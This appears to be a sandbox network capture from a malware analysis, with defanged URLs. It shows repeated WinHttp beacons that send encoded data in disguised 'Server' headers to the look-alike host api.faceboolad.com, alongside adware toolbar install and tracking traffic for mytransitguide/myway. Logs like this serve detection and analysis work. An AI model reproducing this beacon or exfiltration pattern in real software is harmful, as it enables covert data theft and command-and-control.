Server: xsDB2shsUsQsDBHBDBZsNsWB9sOBOB7BhBcB7BRBRBmB7BhBRBOBxBZsWBeshB7BGBABWB7BWBhBRBesABABcBqBZsDBvBDBHsds7sQsDBHBqBvBDBcsQsOsDBHBDBLsVsvsUshsRsqsfBGBfBMsAsHsVsWsusHsQsfBZsUsVsHsVshsvsfB5sQsOscsVs2sQsfBysus2sJsfBqBfBksmB7BfBXBBs1sVsAsUsHBGB7BOBqBJBDBvBDBfsOshsRsqsQsOsDBHBDBDBvBDB1sqsQsOsDBHBDBDBvBDB7susqsqsDBHBDBDBvBDB2shshsJsVsQsqsDBHBDBDBvBDBusVsUsDBHBOBvBDB1sHsds7sQsDBHBOBN0
Server-Key: tlNB9zbeZ8pswrIKgj50SyL6MEFCnaiP3D2fu4ToQUJXVYhvWAqOG7Rc1Hxmdk
Host: api.faceboolad.com


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 326
Content-Type: text/plain; charset=gb2312
Expires: -1
Server: Microsoft-IIS/8.5
Server-Key: PYac2j1v9X7GItfdSTnWueJHLmUl5gQCk4OxBhqrME3Dwp6FzVKo0RNi8bsyZA
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 02 Dec 2016 18:04:39 GMT
[CODE]PYac2j1v9X7GItfdSTnWueJHLmUl5gQgXlXyXUXVYlX3XlXSXlX3XlXTXlXVYlXy
XUXsXUXmXUXoXUXyXUXiYlXKXlXVYlXVYlXSXlXfXlXKXlXyXUXsXUXyXUXTXlXzXlXRXl
XSXlX3XlXKXlXRYUXjXlXAXlXiYlXzXlXTXlX3XlXKXlXeXlXNYlXmXlX1XlXAXlXRYUXX
XlXSXlXVYlX3XlXRYUX3XlXKYlXiYlXKXlXRYUXVYlXTXlXjXlXjXlXKXlXVYlXVYlXwXU
XyXUXWXHXCk4OxBhqrME3Dwp6FzVKo0RNi8bsyZA[CODE]



GET /api//send HTTP/1.1
Connection: Keep-Alive
Accept: */*
Referer: hXXp://VVV.facebook.com
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Server: 0pkt4pgpOpLpkt1tktspPpotbpjtjtMtgtStMtWtWtQtMtgtWtjt0tspot7pgtMtJt5totMtotgtWt7p5t5tStBtspkt9tkt1prpMpLpkt1tBt9tktSpLpjpkt1tktepcp9pOpgpWpBpitJtitZp5p1pcpopNp1pLpitspOpcp1pcpgp9pitqpLpjpSpcp4pLpitTpNp4pIpitBtitXpQtMtit8ttpEpcp5pOp1tJtMtjtBtItkt9tktipjpgpWpBpLpjpkt1tktkt9tktEpBpLpjpkt1tktkt9tktMpNpBpBpkt1tktkt9tkt4pgpgpIpcpLpBpkt1tktkt9tktNpcpOpkt1tjt9tktEp1prpMpLpkt1tjtPm
Server-Key: vzPtbVd7sa3p6DxAUfqmGTeKZRCul2hHFk4iNYwyLOI8cng9o5BjJMWSE10QrX
Host: api.faceboolad.com


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 326
Content-Type: text/plain; charset=gb2312
Expires: -1
Server: Microsoft-IIS/8.5
Server-Key: Y7p9jLgIiT126swx50Sq8XDmbnRuok3W4dHhEGcaVveMFJtCNrOBUzylQKfZPA
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 02 Dec 2016 18:04:49 GMT
[CODE]Y7p9jLgIiT126swx50Sq8XDmbnRuok3qTmTMTy7DTmTCTmT2TmTCTmTfTmTDTmTM
Ty7kTy7zTy7sTy7MTy7lTmTETmTDTmTDTmT2TmTnTmTETmTMTy7kTy7MTy7fTmTLTmTHTm
T2TmTCTmTETmTaTy7gTmT0TmTlTmTLTmTfTmTCTmTETmTATmTN7mTzTmTKTmT0TmTaTy7j
TmT2TmTDTmTCTmTaTy7CTmTcTmTlTmTETmTaTy7DTmTfTmTgTmTgTmTETmTDTmTDTmTz7y
7MTy7RTr7W4dHhEGcaVveMFJtCNrOBUzylQKfZPA[CODE]



GET /api//send HTTP/1.1
Connection: Keep-Alive
Accept: */*
Referer: hXXp://VVV.facebook.com
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Server: nSyihLDL0LELyiYLyinLjL1iWLIiIilihiviliViViJilihiViIiQinL1iiLhiliUiai1ili1ihiViiLaiaivikinLyi4iyilLBSaLELyiYLki4iyiILELeLyiYLyi7LZLxL0LDLkLKLmiUimi5LCLlLZL9LFLlLELminL0LZLlLZLDLxLmiALELeLILZLhLELmizLFLhLVLmikimiYSJilimixiRLULZLCL0LYLUiliIikiDiyi4iyi4LeLDLkLKLELeLyiYLyiyi4iyiULKLELeLyiYLyiyi4iyiaLFLKLKLyiYLyiyi4iyihLDLDLVLZLELKLyiYLyiyi4iyiFLZL0LyiYLIi4iyiULlLBSaLELyiYLIiML
Server-Key: YBqniPcWRjX8Ldw2obg5S7zGfAHOpu6N3s0EmtyF4hC9xDTZvVlUIka1eKrMJQ
Host: api.faceboolad.com


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 326
Content-Type: text/plain; charset=gb2312
Expires: -1
Server: Microsoft-IIS/8.5
Server-Key: qsHI325SKLTZUPRdMCNlWxuvEbi8tnkG4FfY1X69r7jQhJBpeayoc0zwmDOgVA
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 02 Dec 2016 18:04:59 GMT
[CODE]qsHI325SKLTZUPRdMCNlWxuvEbi8tnkdUxUy3w3HUlUsWlUA3lUsWlUJUlUHUlUy
3w3wUlU7Uw3mUw3y3w3vUlUGUlUHUlUHUlUA3lUkUlUGUlUy3w3wUlUy3w3JUlUHWlU1Ul
UA3lUsWlUGUlU03w3o3lUMUlUvUlUHWlUJUlUsWlUGUlUQUlUfUlUBUlU03lUMUlU03w3e
UlUA3lUHUlUsWlU03w3sWlUzUlUvUlUGUlU03w3HUlUJUlUo3lUo3lUGUlUHUlUHUlUkUw
3y3w3XUlUG4FfY1X69r7jQhJBpeayoc0zwmDOgVA[CODE]



GET /api//send HTTP/1.1
Connection: Keep-Alive
Accept: */*
Referer: hXXp://VVV.facebook.com
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Server: hwdpfsCs4sKsdp0sdphs3sjpQsUpUpApfpcpApSpSp1pApfpSpUpxphsjppsfpApMpzpjpApjpfpSppszpzpcpqphsdpapdpAsOwzsKsdp0sqpapdpUsKsesdp0sdpgsTsVs4sCsqsrsHpMpHpvsysAsTsWsNsAsKsHphs4sTsAsTsCsVsHpLsKsesUsTsfsKsHpXsNsfsSsHpqpHp0w1pApHpVplsMsTsys4s0sMpApUpqpCpdpapdpasesCsqsrsKsesdp0sdpdpapdpMsrsKsesdp0sdpdpapdpzsNsrsrsdp0sdpdpapdpfsCsCsSsTsKsrsdp0sdpdpapdpNsTs4sdp0sUpapdpMsAsOwzsKsdp0sUpGs
Server-Key: 0Othpb6Ql3DBskiRZ7PvwgX2uLEImn5JF84KH9dNafyWVCYTcSAMUqzjeroG1x
Host: api.faceboolad.com


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 326
Content-Type: text/plain; charset=gb2312
Expires: -1
Server: Microsoft-IIS/8.5
Server-Key: nvg1jqpxY9R3SDr6UytIiK4dXaFVez5WmZchb8sTMQEB2JuNflLCGo70OHPkwA
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 02 Dec 2016 18:05:09 GMT
[CODE]nvg1jqpxY9R3SDr6UytIiK4dXaFVez5K3f1V3L1y3f1D3f1h3f1D3f1r3f1y3f1V
3L1D3L1g3L163L1V3L1T3f1U3f1y3f1y3f1h3f1L3f1U3f1V3L1D3L1V3L1r3f1u3f1i3f
1h3f1D3f1U3f1J3L1c3f1O3f1T3f1u3f1r3f1D3f1U3f1g3f1t3f163f1a3f1O3f1J3L1l
3f1h3f1y3f1D3f1J3L1D3f1l1f1T3f1U3f1J3L1y3f1r3f1c3f1c3f1U3f1y3f1y3f1c3L
1V3L1s3S3WmZchb8sTMQEB2JuNflLCGo70OHPkwA[CODE]


GET /images/download/spokesperson/html5/audio/spokesperson.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: hXXp://free.mytransitguide.com/index.jhtml
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ak.imgfarm.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 10 Aug 2016 20:37:05 GMT
ETag: "8c0e4d-836b-539bd9cc03e40"
Accept-Ranges: bytes
Content-Length: 33643
Cache-Control: max-age=315290129
Expires: Sat, 08 Aug 2026 20:37:05 GMT
Content-Type: application/javascript
Date: Fri, 02 Dec 2016 18:04:34 GMT
Connection: keep-alive
(function () {
    function isIE() {
        var myNav = navigator.userAgent.toLowerCase();
        return (myNav.indexOf('msie') != -1) ? parseInt(myNav.split('msie')[1]) : false;
    }
    var spokesperson_height;
    if (isIE() && isIE() < 9) {
        return;
    }
    else if (isIE())
    {
        var spokesperson_pos_bottom = "-4";
        spokesperson_height = "47";
    }
    var spDiv = document.createElement("div");
    spDiv.id = "wthvideo";
    var h264Fallback = document.createElement("h264Fallback");
    h264Fallback.id = "h264Fallback";
    var videoBox = document.createElement("video");
    videoBox.id = "videoBox";
    h264Fallback.appendChild(videoBox);
    spDiv.appendChild(h264Fallback);
    var wthbody = document.body || document.getElementsByTagName("body")[0];
    wthbody.appendChild(spDiv);
// Copyright 2015 Website Talking Heads
// JavaScript Document
    if (typeof(spokesperson_pathname) === 'undefined') {
        var spokesperson_pathname = "hXXp://imgfarm.com/images/download/spokesperson/html5/audio/files";
    }
    if (typeof(spokesperson_filename) === 'undefined') {
        var spokesperson_filename = "v3_spokesperson";
    }
    if (typeof(spokesperson_imgname) === 'undefined') {
        var spokesperson_imgname = "blank";
    }
    if (typeof(spokesperson_autoplay) === 'undefined') {
        var spokesperson_autoplay = "yes";
    }
    if (typeof(spokesperson_audioonly) === 'undefined') {
        var spokesperson_audioonly = "yes";

<<< skipped >>>

GET /images/anx/anemone-1.2.7.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: hXXp://free.mytransitguide.com/index.jhtml
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: akz.imgfarm.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7k
Last-Modified: Mon, 08 Jul 2013 20:02:48 GMT
ETag: "774114-a236-874e8a00"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 11189
Cache-Control: max-age=207971871
Expires: Thu, 06 Jul 2023 20:02:25 GMT
Date: Fri, 02 Dec 2016 18:04:34 GMT
Connection: keep-alive

<<< skipped >>>

GET /images/vicinio/dsp-images/jeremy.jacinto/background/1471015123308.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://free.mytransitguide.com/index.jhtml
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ak.imgfarm.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 12 Aug 2016 15:18:44 GMT
ETag: "8721c4-530-539e165ed0c5d"
Accept-Ranges: bytes
Content-Length: 1328
Cache-Control: max-age=305673249
Expires: Mon, 10 Aug 2026 15:18:44 GMT
Content-Type: image/png
Date: Fri, 02 Dec 2016 18:04:34 GMT
Connection: keep-alive

<<< skipped >>>

GET /prd/ttdetectUtil.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: hXXp://free.mytransitguide.com/index.jhtml
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ttdetect.staticimgfarm.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 17 Aug 2016 14:30:22 GMT
ETag: "3f18a9-53ea-53a454e3136a3"
Accept-Ranges: bytes
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=22856521
Expires: Thu, 24 Aug 2017 07:06:35 GMT
Date: Fri, 02 Dec 2016 18:04:34 GMT
Content-Length: 7730
Connection: keep-alive

<<< skipped >>>

POST /mirrorCookies.jhtml HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: hXXp://free.mytransitguide.com/index.jhtml
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: mytransitguide.dl.myway.com
Content-Length: 2662
Connection: Keep-Alive
Cache-Control: no-cache

sessionData=,,-1,false,1,"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"&language=,,-1,false,1,en&partnerId=,,-1,false,1,^BNH^orgyyy^S18590^ua&installDate=,,-1,false,1,2016120208&ttabFirstInstall=,,-1,false,1,true&coId=,,-1,false,1,3121b0a55fdb406
HTTP/1.1 200 OK
Date: Fri, 02 Dec 2016 18:04:34 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: hXXp://free.mytransitguide.com
Access-Control-Allow-Methods: GET, POST
Access-Control-Max-Age: 1000
X-XSS-Protection: 0
P3P: CP='CURa ADMa DEVa PSA PSD OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: sessionData="tC7XLVSg6z8g3PZQ8L1Jd7fYEV2N1Od43W0W2RmzENs90yXvipTK/j6TFxTk4dSwxuQWljAedxSdh SiFsGi4NGkw7ePy/oKNZPpTwCEs b5J8v4vQNQAIBJnfgkI3VA8ma4lcy73mKk0zCUnT5j3xAyen01861pGjJfsj7wJsIS5sSUDVupjcLu0fmBSNV7wTkVYREC9dxMh2JJy7R8kUpkvjkpFtTzx RZ3yRmlYHqIJ8RUlF9k66cs0CudhqnVcfEXBQpHWubmnxYYDfkefW9etXDGC22DDTnPABoMzirKR5lJXoi5GkVNB0WgpxP0Lrx0UlU16ZniRYz4x3T1VwEMrx8/f6hx2NkYJjTM5v6pXjQj/QeARDu9CfbCDfl4AEJlv14SkQJQDfVh8qUp6yMCGSXuwer1LwhJ7fT0zB un Q0pVP143IktpAu6hxXnI/oSHR/4/BDyVcYQNp/uvxY/vPi7KN5bcELSXeSzAjqpstOzn VyJ0cskApa8AzMG4eDMTml5K5/EZX3SN5to3Cx513fYxAToKTZPvE/73UHYHL6DATK8pbMMD8TZb46Or3Z8H4W6YT3nou4SGRX6qJX9GhJF7IwhgPFNKRjz /U6lPtw91tFIih3TbVBvnx27hlDtlTwkSbYtHQXGOyTIo0ko9I2APDWAaO8mfjSOLhViGox5S3B5hXNlxj1HPzIQUObYdEowJEvoe78dm7HpDRuNRtCS2oe4ZM8tbT4OVjdsS2047hFayjsAnWG1c8n/fmFjfJ23qPOYbHFP3g=="; Version=1; Domain=mytransitguide.dl.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: language=en; Version=1; Domain=mytransitguide.dl.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: partnerId=^BNH^orgyyy^S18590^ua; Version=1; Domain=mytransitguide.dl.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: installDate=2016120208; Version=1; Domain=mytransitguide.dl.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: ttabFirstInstall=true; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: coId=3121b0a55fdb4060b313a5cb88f90289; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: npsSurveyUrl=""; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: toolbarId=75357AF2-6820-49C9-86BD-ECF27652C299; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: partnerSubId=""; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: dlput=S18590; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: installType=MSNI; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: successUrl="hXXp://free.mytransitguide.com/installComplete.jhtml"; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: chromeShowToolbar=nowhere; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: ChromeExtensionCopies=stubby; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: newTabURL="hXXp://hp.myway.com/mytransitguide/s18590/index.html?n=780BD6C7&"; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: newTabCache=false; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: newTabBubbleURL="hXXp://free.mytransitguide.com/chromeInstruct.jhtml?tabView=bubble"; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: newTabInstructURL="hXXp://free.mytransitguide.com/chromeInstruct.jhtml?tabView=instruct"; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: newTabSuccessURL="hXXp://free.mytransitguide.com/chromeInstruct.jhtml?tabView=success"; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: pixelUrl="hXXp://free.mytransitguide.com/install_pixels.jhtml?partner=^BNH^orgyyy^S18590^ua&coId=3121b0a55fdb4060b313a5cb88f90289&tbGuid=[TBUID]"; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: defaultSearchOption=false; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: defaultSearch=false; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: homePageOption=false; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: homePage=false; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: countryCode=UA; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: cakeId=""; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: campaign=orgyyy; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: cobrand=BNH; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/
Set-Cookie: anx="xracl=&xckoid=&xgds=&lv=1480701874784&xad=&xmvte=&xit=&xlang=&xmvtv=&xmvtt=&xckid=&xrm=&xrp=&xrs=&xrt=&xnt=&xriad=&xft=&nv=1&fv=1480701874784&xuer=&ob=-&oc=-&od=free.mytransitguide.com&xgc=&sn=dubprdsndlbfe17.dub.jabodo.com&ok=-&om=referral&xrkw=&xrco=&xrca=&op=index.jhtml&xrcc=&os=-&surveyUrl=&xkw=&g=-&xct=&xiad=&xbkw=&tbGuid=&xg=&xh=&xi=&xtp=&xn=&xp=&xtt=&xpp=&xs=&xt=&xu=&xcid="; Version=1; Domain=.myway.com; Max-Age=7776000; Expires=Thu, 02-Mar-2017 18:04:34 GMT; Path=/
Via: 1.1 VVV.mapsgalaxy.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Set-Cookie: ltm-1d=rd119o00000000000000000000ffff0a904c19o80; expires=Sat, 03-Dec-2016 18:04:32 GMT; path=/

<<< skipped >>>

GET /prd/ttdetect.html?&op=g&cobrand=BNH&xdm_e=http://free.mytransitguide.com&xdm_c=default7926&xdm_p=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: hXXp://free.mytransitguide.com/index.jhtml
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ttdetect.staticimgfarm.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 17 Aug 2016 14:30:23 GMT
ETag: "3f18a8-6b15-53a454e3f7ab3"
Accept-Ranges: bytes
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=24897536
Expires: Sat, 16 Sep 2017 22:03:30 GMT
Date: Fri, 02 Dec 2016 18:04:34 GMT
Content-Length: 10125
Connection: keep-alive

<<< skipped >>>

GET /index.jhtml HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: hXXp://bus.ad-jump.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: free.mytransitguide.com


HTTP/1.1 200 OK
Date: Fri, 02 Dec 2016 18:04:32 GMT
Server: Apache-Coyote/1.1
P3P: CP='CURa ADMa DEVa PSA PSD OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-UA
Set-Cookie: userSegment=""; Domain=.mytransitguide.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sessionData="tC7XLVSg6z8g3PZQ8L1Jd7fYEV2N1Od43W0W2RmzENs90yXvipTK/j6TFxTk4dSwxuQWljAedxSdh SiFsGi4NGkw7ePy/oKNZPpTwCEs b5J8v4vQNQAIBJnfgkI3VA8ma4lcy73mKk0zCUnT5j3xAyen01861pGjJfsj7wJsIS5sSUDVupjcLu0fmBSNV7wTkVYREC9dxMh2JJy7R8kUpkvjkpFtTzx RZ3yRmlYHqIJ8RUlF9k66cs0CudhqnVcfEXBQpHWubmnxYYDfkefW9etXDGC22DDTnPABoMzirKR5lJXoi5GkVNB0WgpxP0Lrx0UlU16ZniRYz4x3T1VwEMrx8/f6hx2NkYJjTM5v6pXjQj/QeARDu9CfbCDfl4AEJlv14SkQJQDfVh8qUp6yMCGSXuwer1LwhJ7fT0zB un Q0pVP143IktpAu6hxXnI/oSHR/4/BDyVcYQNp/uvxY/vPi7KN5bcELSXeSzAjqpstOzn VyJ0cskApa8AzMG4eDMTml5K5/EZX3SN5to3Cx513fYxAToKTZPvE/73UHYHL6DATK8pbMMD8TZb46Or3Z8H4W6YT3nou4SGRX6qJX9GhJF7IwhgPFNKRjz /U6lPtw91tFIih3TbVBvnx27hlDtlTwkSbYtHQXGOyTIo0ko9I2APDWAaO8mfjSOLhViGox5S3B5hXNlxj1HPzIQUObYdEowJEvoe78dm7HpDRuNRtCS2oe4ZM8tbT4OVjdsS2047hFayjsAnWG1c8n/fmFjfJ23qPOYbHFP3g=="; Version=1; Domain=.mytransitguide.com; Path=/
Set-Cookie: org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=en_UA; Path=/
Set-Cookie: anx="xracl=&xckoid=&xgds=&lv=1480701872700&xad=&xmvte=&xit=&xlang=en&xmvtv=&xmvtt=&xckid=&xrm=&xrp=^BNH^orgyyy^S18590^ua&xrs=&xrt=S18590&xnt=&xriad=&xft=&nv=1&fv=1480701872700&xuer=1&ob=-&oc=-&od=bus.ad-jump.com&xgc=false&sn=dubprdsndlbfe47.dub.jabodo.com&ok=-&om=referral&xrkw=&xrco=BNH&xrca=orgyyy&op=-&xrcc=ua&os=-&surveyUrl=&xkw=&g=-&xct=&xiad=&xbkw=&tbGuid=75357AF2-6820-49C9-86BD-ECF27652C299&xg=&xh=8681&xi=MSNI&xtp=vhigh&xn=&xp=vicinio&xtt=template_new&xpp=^BNH^orgyyy^S18590^ua&xs=29954&xt=intdefault&xu=&xcid=3121b0a55fdb4060b313a5cb88f90289"; Version=1; Domain=.mytransitguide.com; Max-Age=7776000; Expires=Thu, 02-Mar-2017 18:04:32 GMT; Path=/
Via: 1.1 VVV.mapsgalaxy.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Set-Cookie: ltm-1d=rd119o00000000000000000000ffff0a904c37o80; expires=Sat, 03-Dec-2016 18:04:30 GMT; path=/

<<< skipped >>>

GET /anemone.jhtml?anxuu=355A1458-B606-4CD6-A42E-AB2595CB700B&anxa=CAPDownloadProcess&anxv=1.0.0&anxd=2011-06-01T04:00:00Z&anxsn=dubprdsndlbfe47.dub.jabodo.com&anxu=http://free.mytransitguide.com/index.jhtml&anxl=en-US&anxlv=1480701872700&anxrd=bus.ad-jump.com&anxrk=-&anxrm=referral&anxrb=-&anxrc=-&anxrs=-&anxsq=1&anxi=F3E6638C-ED5D-4BD2-9768-0AC49325CE9F&anxe=backFill&anxr=903713179 HTTP/1.1

Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://free.mytransitguide.com/index.jhtml
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: free.mytransitguide.com
Connection: Keep-Alive
Cookie: sessionData="tC7XLVSg6z8g3PZQ8L1Jd7fYEV2N1Od43W0W2RmzENs90yXvipTK/j6TFxTk4dSwxuQWljAedxSdh SiFsGi4NGkw7ePy/oKNZPpTwCEs b5J8v4vQNQAIBJnfgkI3VA8ma4lcy73mKk0zCUnT5j3xAyen01861pGjJfsj7wJsIS5sSUDVupjcLu0fmBSNV7wTkVYREC9dxMh2JJy7R8kUpkvjkpFtTzx RZ3yRmlYHqIJ8RUlF9k66cs0CudhqnVcfEXBQpHWubmnxYYDfkefW9etXDGC22DDTnPABoMzirKR5lJXoi5GkVNB0WgpxP0Lrx0UlU16ZniRYz4x3T1VwEMrx8/f6hx2NkYJjTM5v6pXjQj/QeARDu9CfbCDfl4AEJlv14SkQJQDfVh8qUp6yMCGSXuwer1LwhJ7fT0zB un Q0pVP143IktpAu6hxXnI/oSHR/4/BDyVcYQNp/uvxY/vPi7KN5bcELSXeSzAjqpstOzn VyJ0cskApa8AzMG4eDMTml5K5/EZX3SN5to3Cx513fYxAToKTZPvE/73UHYHL6DATK8pbMMD8TZb46Or3Z8H4W6YT3nou4SGRX6qJX9GhJF7IwhgPFNKRjz /U6lPtw91tFIih3TbVBvnx27hlDtlTwkSbYtHQXGOyTIo0ko9I2APDWAaO8mfjSOLhViGox5S3B5hXNlxj1HPzIQUObYdEowJEvoe78dm7HpDRuNRtCS2oe4ZM8tbT4OVjdsS2047hFayjsAnWG1c8n/fmFjfJ23qPOYbHFP3g=="; anx="u=355
HTTP/1.1 204 No Content
Date: Fri, 02 Dec 2016 18:04:34 GMT
Server: Apache-Coyote/1.1
Via: 1.1 VVV.mapsgalaxy.com
Content-Length: 0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive



GET /anemone.jhtml?anxuu=355A1458-B606-4CD6-A42E-AB2595CB700B&anxa=CAPDownloadProcess&anxv=1.0.0&anxd=2011-06-01T04:00:00Z&anxsn=dubprdsndlbfe47.dub.jabodo.com&anxu=http://free.mytransitguide.com/index.jhtml&anxl=en-US&anxlv=1480701872755&anxsq=3&present=false&anxe=ToolbarDetect&anxr=1137261564 HTTP/1.1

Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://free.mytransitguide.com/index.jhtml
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: free.mytransitguide.com
Connection: Keep-Alive
